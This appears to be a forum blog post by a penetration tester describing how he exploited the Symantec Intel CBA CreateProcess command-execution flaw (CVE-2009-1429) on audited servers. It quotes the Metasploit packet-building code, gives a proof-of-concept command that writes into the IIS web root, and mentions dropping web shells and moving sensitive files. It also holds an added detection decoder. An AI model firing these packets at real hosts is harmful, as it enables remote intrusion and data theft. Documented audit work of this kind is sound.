Penetration testing - [Intel CBA CreateProcess() on Symantec]

    One of the best ways of getting a good output from a PT when you have a huge number of IPs to audit, and considerably less time, is to:
    [+] Run an Nmap scan on all the IPs and see if any common service is running on them.
    [-] Admins who manage DCs usually have the habit of installing extra add-on services on their hosts.
    [-] System updates are done properly, but add-on updates are neglected.
    [+] So the same third-party services will be installed widely across all the hosts.

    Anyway, this common, stupid practice was something I noticed, but this find is all about exploiting the Intel CBA CreateProcess() on Symantec, which has CVE: http://cve.mitre.org/cgi-bin/cvename...=CVE-2009-1429, and the Nessus Home feed has a plugin for listing this bug.



    [+] Symantec is the widely used IDS+AV system for most corporate networks.
    [+] The Symantec client will be installed on all the systems.
    [-] So if one vulnerable target is found, the probability is high that many other vulnerable systems will be there too.

    Triggering the exploit

    This one is actually a command execution exploit: when a data packet with a CMD string is passed to the listener, the string is passed on to the Symantec product's CreateProcess() and interpreted as a command, making it possible to execute OS commands remotely.


    MSF has a module for this one in:
    auxiliary\admin\symantec\cba_exec.rb

    Code:
    # Build the CBA exec packet: 4-byte zero header, one length byte covering
    # CMD + trailing space + terminating null, a 0x00 separator, then the command.
    len  = 2 + datastore['CMD'].length

    data =  [0x00000000].pack('V')
    data << len.chr
    data << "\x00"
    data << datastore['CMD'] + " "   # Windows command to be passed
    data << "\x00"

    print_status("Sending command: #{datastore['CMD']}")
    sock.put(data)

    # Any reply at all is taken as a sign the command was accepted
    res = sock.get_once

    if (!res)
      print_error("Did not receive data. Failed?")
    else
      print_status("Got data, execution successful!")
    end

    disconnect
    I loaded MSF with the associated auxiliary module.
    [+] The current PT was done on servers with Symantec Corporate Edition installed, and it was easy to 0wn them all.
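A detection-side decoder for the packet layout in that excerpt, as an added example (not the post's or the Metasploit module's code): it recovers the command carried by a captured payload so a monitoring hook can flag writes into a web root like the one used below. The ESCALATE pattern, the CbaExec/parse_cba_exec/triage names and the sample captures are this example's own constructions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Four zero bytes, as written by [0x00000000].pack('V') in the excerpt.
CBA_HEADER = b"\x00\x00\x00\x00"

# Constructed heuristic: commands a reviewer would escalate first
# (output redirection, account or registry changes, web-root paths).
ESCALATE = re.compile(r"(>|\bnet\s+user\b|\breg\s+add\b|wwwroot)", re.IGNORECASE)


@dataclass
class CbaExec:
    command: str
    escalate: bool


def parse_cba_exec(payload: bytes) -> Optional[CbaExec]:
    """Decode one CBA exec packet, or return None if the framing does not match.

    Framing from the excerpt: header, one length byte equal to 2 + len(CMD)
    (the byte count of CMD, the trailing space and the final 0x00), a 0x00
    separator, CMD, a space, 0x00.
    """
    if len(payload) < 7 or not payload.startswith(CBA_HEADER):
        return None
    length_byte, separator = payload[4], payload[5]
    tail = payload[6:]  # CMD + b" " + b"\x00"
    if separator != 0 or len(tail) != length_byte or not tail.endswith(b" \x00"):
        return None
    command = tail[:-2].decode("latin-1")
    return CbaExec(command, bool(ESCALATE.search(command)))


def triage(payloads: List[bytes]) -> List[str]:
    """Return the decoded commands that warrant escalation."""
    hits = []
    for p in payloads:
        parsed = parse_cba_exec(p)
        if parsed and parsed.escalate:
            hits.append(parsed.command)
    return hits


def _frame(cmd: bytes) -> bytes:
    """Constructed sample packets following the excerpt's framing (test data only)."""
    return CBA_HEADER + bytes([2 + len(cmd)]) + b"\x00" + cmd + b" \x00"


# Constructed captures: the post's own PoC command, a benign command, and a
# payload with a different header that must not be decoded as a command.
SAMPLES = [
    _frame(b"echo FB1H2S > c:\\inetpub\\wwwroot\\fb1h2s.html"),
    _frame(b"hostname"),
    b"\x01\x00\x00\x00\x05\x00ping \x00",
]

if __name__ == "__main__":
    print(triage(SAMPLES))
```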

    I loaded MSF and chose the right exploit.


    Woot woot, the commands I set got executed successfully.

    Well, my scope of work was VA + PT, but as the targets were critical ones I should not under any circumstances execute anything harmful or change any passwords. A PoC of the exploit was still needed in the report, though, so what I did was this.

    [+] When the Nmap scan was done it showed that IIS was running, with the IIS default page iisstart.html.


    [+] Now that we have a world-readable folder in C:\inetpub\wwwroot, we could change, modify, edit or add any files there.

    [+] Just set the exploit's CMD argument to:

    Code:
     echo FB1H2S > c:\\inetpub\\wwwroot\\fb1h2s.html
    But I wanted the default page, so I just modified the iisstart.html page with a Security audit banner.



    [+] Likewise I took the other vulnerable systems.

    [+] But this is not the extent of what we could do: we could drop a PHP or ASP shell in the IIS directory and run it, set arbitrary registry values and execute other malicious scripts, download other sensitive files by moving them to the server's HTTP directory, and a lot more, but as my scope of work was over I quit thinking about more wicked stuff.

    Regards
    FB1H2S
    This article was originally published in the blog "Penetration testing - [Intel CBA CreateProcess() on Symantec]" started by fb1h2s.
    Comments (2)

    D4rk357 -
      Awesome one bro.. Admin would have had a major heart attack seeing Security audit banner

    acutev6 -
      Nice one buddy.. Good work..!